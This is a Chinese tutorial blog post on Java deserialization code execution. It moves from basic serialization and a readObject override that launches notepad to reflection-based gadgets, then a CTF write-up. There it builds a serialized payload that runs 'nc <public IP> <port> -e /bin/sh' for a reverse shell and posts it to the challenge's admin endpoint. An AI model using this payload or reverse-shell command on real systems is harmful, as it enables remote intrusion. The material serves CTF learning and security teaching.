Java反序列化代码执行案例分析

最新推荐文章于 2024-07-29 14:22:26 发布
最新推荐文章于 2024-07-29 14:22:26 发布
阅读量799 收藏 3
点赞数 1
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44700621/article/details/125131098
版权

文章目录

1 序列化与反序列化简单示例

1.1序列化

  1. 定义一个Demo类,并implements Serializable,否则无法对其进行序列化操作
package Test;
import java.io.*;
class Demo implements Serializable {
    public String a;
    public String b;
    // Default constructor 构造函数
    public Demo(String a, String b){
        this.a = a;
        this.b = b;
    }
}
  1. 实例化一个Demo对象,应用ObjectOutputStream.writeObject方法将Demo对象序列化结果输出至file.ser文件中
public class Hello {
    public static void main(String[] args) throws FileNotFoundException {
        Demo object = new Demo("hello", "world"); // Instance 实例化Demo对象
        String filename = "file.ser"; // 序列化结果输出文件
        // Serialization
        try
        {
            // saving of object in a file
            FileOutputStream file = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);
            // Method for serialization of object
            out.writeObject(object);
            out.close();
            file.close();
            System.out.println("Object has been serialized");
        } catch (IOException e) {
            System.out.println("IOException is caught");
            e.printStackTrace();
        }
    }
}

在这里插入图片描述

1.2序列化数据流特征

在Windows系统下使用notepad++,在linux系统下使用hexdump -C file.ser查看十六进制文件,可以看到文件开头为ac ed 00 05,该串数字为Java序列化数据流的标志,经过BASE64编码后开头变为rO0,因此看到以ac ed 开头的数据流,基本上可以判断为Java序列化后的数据。
在这里插入图片描述

1.3反序列化

Demo object1 = null;
try // Deserialization
 {
     // Reading the object from a ser file
     FileInputStream file = new FileInputStream(filename);
     ObjectInputStream in = new ObjectInputStream(file);
     // Method for deserialization of object
     object1 = (Demo)in.readObject();
     in.close();
     file.close();
     System.out.println("Object has been deserialized");
     System.out.println("a = " + object1.a);
     System.out.println("b = " + object1.b);
 }

在这里插入图片描述

2 readObject方法重写,打开记事本

重写Demo类的readObject方法,在反序列化过程中会执行重写后的代码,只需要在readObject方法中调用Runtime打开记事本即可。

class Demo implements Serializable {
    public String a;
    public String b;
    // Default constructor 构造函数
    public Demo(String a, String b){
        this.a = a;
        this.b = b;
    }
    private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
        input.defaultReadObject();
        Runtime.getRuntime().exec("notepad.exe");
    }
}

在这里插入图片描述

3 应用反射机制实现反序列化代码执行

3.1反射机制相关方法介绍

Java反射机制的原理此处不做介绍,列举一下应用反射原理实现反序列化代码执行的相关方法。

  • forName

forName方法的作用是为了动态加载类,程序在最初运行的时候并不把全部需要的类加载至JVM中,在程序运行的过程中根据需要通过类名获取相应的Class对象,并将其加载进来。

Class.forName("java.lang.Runtime") // 加载java.lang.Runtime类
  • getMethod(String name,Class…parameterTypes)

getMethod方法根据方法名称和相关参数,来定位需要查找的Method对象并返回。

class.getMethod("method1", String.class, String.class); // 找到一个名称为method1并且参数为两个String类型的方法
class.getMethod("method2", new Class[0]); // 找到一个名称为method2并且无参数的方法
  • invoke(Object obj,Object…args)

调用包装在当前Method对象中的方法,第一个参数为实例化的对象,第二个参数为调用该方法需要的参数列表。注意如果调用静态方法,则不需要传入实例化的对象,使用null占位即可。

3.2定义命令执行恶意exploit方法

  1. 非静态方法,传入参数new Demo("Test.Demo", "exploit");
class Demo implements Serializable {
    public String a;
    public String b;
    // Default constructor 构造函数
    public Demo(String a, String b){
        this.a = a;
        this.b = b;
    }
    public void exploit() throws IOException {
        Runtime.getRuntime().exec("notepad.exe");
    }
    private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
        input.defaultReadObject();
        Class.forName(a).getMethod(b, new Class[0]).invoke(Class.forName(a).getDeclaredConstructor(String.class, String.class).newInstance("123","123"), new Object[0]); 
    }
}

在这里插入图片描述
下面对应用反射机制调用exploit方法的过程进行拆解

// Class.forName(a).getMethod(b, new Class[0]).invoke(Class.forName(a).getDeclaredConstructor(String.class, String.class).newInstance("123","123"), new Object[0]);
Class c = Class.forName(a); // 参数a为Test.Demo,根据名字找到对应的类,并加载至JVM
Method m = c.getMethod(b, new Class[0]); // 参数b为exploit,由于该方法无参数,因此参数类型列表传入new Class[0]
Object o = c.getDeclaredConstructor(String.class, String.class).newInstance("123","123"); // exploit方法并非静态方法,需要实例化一个对象
m.invoke(o, new Object[0]); // 调用exploit方法,传入刚实例化的对象,由于无参数,因此传入new Object[0]即可
  1. 静态方法

exploit方法加上static修饰,并将类实例化部分用null占位即可

Class.forName(a).getMethod(b, new Class[0]).invoke(Class.forName(a), new Object[0]);

4 CTF show [单身杯 WEB] blog

此题目前半部分如何成为admin,class文件读取部分略过,详情请见CTF show单身杯官方wp,重点介绍如果构造反序列化命令执行payload实现反弹shell

  1. UserEntity.java中反序列化利用点,并且四个参数username,password,email,address均可控
private void readObject(ObjectInputStream input)
            throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException
    {
        input.defaultReadObject();
        Class.forName(username).getMethod(email, new Class[] {
                String.class
        }).invoke(Class.forName(username).getMethod(password, new Class[0]).invoke(Class.forName(username), new Object[0]), new Object[] {
                address
        });
    }
  1. AdminController.java从url中读取数据流,并进行反序列化操作
public String adminConsole(String token, String url, HttpSession session, Model model)
        throws IOException, ClassNotFoundException
    {
        if(token != null && token.equals(session.getAttribute("token"))) // 判断token参数是否一致
        {
            URL fileUrl = new URL(url); // 文件读取
            ObjectInputStream objectInputStream = new ObjectInputStream(fileUrl.openStream());
            objectInputStream.readObject();
            model.addAttribute("message", "\u66F4\u65B0\u6210\u529F");
        } else
        {
            model.addAttribute("message", "\u66F4\u65B0\u5931\u8D25\uFF0Ctoken\u65E0\u6548");
        }
        return "pageMessage";
    }
  1. 基于上述介绍的应用JAVA反射机制构造反序列化代码执行恶意payload
public class Main {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        UserEntity userEntity = new UserEntity();
        userEntity.setUsername("java.lang.Runtime");
        userEntity.setPassword("getRuntime");
        userEntity.setEmail("exec");
        userEntity.setAddress("nc 公网ip地址 监听端口 -e /bin/sh");
        FileOutputStream fos = new FileOutputStream("exp");
        ObjectOutputStream out = new ObjectOutputStream(fos);
        out.writeObject(userEntity);
        out.close();
        fos.close();
    }
}
// 过程分解 java.lang.Runtime.getRuntime().exec("nc 公网ip地址 监听端口 -e /bin/sh")
// 1.从java.lang.Runtime中获取exec方法,方法参数为String.class,调用该exec方法,传入一个getRuntime()对象与方法参数
 Class.forName(username).getMethod(email, new Class[] {String.class}).invoke( obj ,new Object[] {address});
// 2. 获取getRuntime()对象,getRuntime为静态方法,并且无参数,因此传入new Class[0]和new Object[0]即可
// 至于Class.forName(username)可以替换为null,对静态方法的调用并无影响
 Class.forName(username).getMethod(password, new Class[0]).invoke(Class.forName(username), new Object[0]),
  1. 将恶意payload对象序列化,结果数据输出至exp文件,传到云服务器,用python3 -m http.server 80开启一个简单的web服务器
    在这里插入图片描述
  2. 构造POST请求,利用反序列化过程中的代码执行实现反弹shell
    在这里插入图片描述
  3. 到根目录下读取flag
    在这里插入图片描述
Make-1t-0r-d1e
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java反序列化
weixin_52221158的博客
08-17 785
JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI 服务供应接口(SPI)的实现,由管理者将JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务直接进行交互。漏洞经常存在于一些 web组件中。例如 weblogic,Fastjson,JBoss,WebSphere,Jenkins,OpenNMS,Shiro。打开idea,看一下源码(在windows系统解压jar包,在idea创建项目查看,找到对应的jar文件,右键选择添加为库即可查看)...
第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)1
08-03
0x02部分,通过登录接口的响应数据,可以看到返回的JWT(JSON Web Token)中可能包含了Java序列化数据。这段数据以“rO0AB”开头,表明它可能是Java序列化数据。通过Python脚本解码并利用SerializationDumper工具...
Java反序列化基础入门
cike_y
03-28 666
Java反序列化入门笔记
常见流量特征
admin的博客
05-17 957
1、特殊关键字:SQL关键字,如SELECT, WHERE, ORDER BY, UNION, UPDATE,DELETE,INSERT等,这些通常用于构建或修改查询系统函数,如USER(), @@VERSION(在MySQL中),这些可能用于获取数据库版本或当前用户等敏感信息特定数据库的函数或特性,如information_schema(用于获取数据库结构信息)、extractvalue(XML相关函数,有时用于绕过某些过滤)、floor(在盲注中用于产生条件差异)等。
PHP反序列化命令执行及防范
金色%夕阳的博客
05-08 1086
PHP反序列化命令执行 1、 序列化反序列化原理 序列化(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。依照序列化格式重新获取字节的结果时,可以利用它来产生与原始对象相同语义的副本。序列化是一种将对象的状态信息转换为可以存储或传输的形式的过程(转化为信息流)。在序列化期间,对象将其当前状态写入到临时或持久性存储区以后,可以通过从存储区中读取或反序列化对象
CTF之think_java反序列化完整案例
qq_36585338的博客
11-30 803
代码】CTF之think_java反序列化完整案例
代码扫描修复】不安全的反序列化攻击(高危)_java反序列化漏洞修复
2401_84302369的博客
05-02 809
将内存对象转化为可以存储以及传输的二进制字节、xml、json、yaml 等格式。将虚化列存储的二进制字节、xml、json、yaml 等格式的信息重新还原转化为对象实例。数据格式序列化后的信息样例二进制在这里插入图片描述xmljsonyaml!/\*\*\* 白名单校验\*/super(in);@Override// 白名单校验if (!使用示例:Test.java/\*\*\* 序列化\*/try {/\*\*\* 反序列化
Day639.序列化反序列化问题 -Java业务开发常见错误
阿昌爱Java
06-06 1652
Hi,来也,今天记录分享学习内容是序列化是把对象转换为字节流的过程,以方便传输或存储。反序列化,则是反过来把字节流转换为对象的过程。在文件 IO问题 的时候,提到字符编码是把字符转换为二进制的过程,至于怎么转换需要由字符集制定规则。同样地,对象的和,也需要由序列化算法制定规则。关于序列化算法,几年前常用的有 、等,但前者不能跨语言,后者性能较差(时间空间开销大);现在 RESTful 应用最常用的是 ,追求性能的 RPC 框架(比如 gRPC)使用 序列化,这 2 种方法都是跨语言的,而且性能不错,应用广
13-java安全——fastjson1.2.24反序列化TemplatesImpl利用链分析
网络安全
08-27 2732
漏洞环境: fastjson1.2.24 jdk1.7.80 新建一个maven项目在pom.xml文件中引入fastjson的依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</v
37-WEB漏洞-反序列化之PHP&JAVA全解(上)
m0_62670778的博客
01-21 1080
5、分析代码,可以得出:要想得到flag的值,要让COOKIE的值与KEY的值相等。原理解析(涉及:反序列化魔术方法调用,弱类型绕过,ascii 绕过)2、比较COOKIE的值与KEY的值是否相等时,存在一个陷阱。这个参数,否则执行的是显示源文件的信息,而不是flag的值。1、可用发现登录按钮无法使用,只是一个摆设。3、使用KEY为空的值,进行反序列化。5、查看网页源代码,获得flag。2、查看网页源代码,发现有一个。7、获得flag的值。4、在url后面加上。1、在URL后面添上。
java 序列化漏洞怎么解决?
半夏_2021的博客
05-05 1366
java 序列化漏洞怎么解决?
Java反序列化漏洞介绍书籍
08-17
1. **Java序列化API**:包括`ObjectOutputStream`和`ObjectInputStream`类的作用,以及如何使用它们进行对象的序列化反序列化操作。 2. **序列化要求**:讨论了哪些对象可以被序列化,以及实现`Serializable`接口...
URLDNS反序列化链学习.doc
07-09
这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能直接执行命令,但可以用于验证漏洞的存在。 1. **URLDNS反序列化链** URLDNS反序列化链...
java反序列化漏洞利用
01-14
Java反序列化漏洞利用是Java安全领域中的一个重要话题,它涉及到程序执行流程中的一个环节——序列化反序列化序列化是将对象的状态转换为字节流的过程,便于存储或网络传输;反序列化则是将字节流恢复为对象的...
Java课程设计案例精编源代码
10-06
通过案例,你可以学习如何读写文件、处理文件流,以及使用Java序列化反序列化技术。 4. **网络编程**:Java提供了丰富的网络编程API,如Socket编程,用于创建客户端和服务端应用程序。这些案例可能包含简单的...
java springboot 集成 阿里通义千问
qq_25987725的博客
07-25 278
一、在阿里云https://www.aliyun.com官网直接搜索“通义千问”,点击“开通DashScope”进行服务激活。四、在config目录添加配置 TongYiAiConfiguration.java。三、在yml中配置中配置key。二、加入Maven依赖。
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 326
1.导入hutool的maven依赖。2.复制一下代码执行
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 231
1.导入hutool的maven依赖。2.直接复制一下代码运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值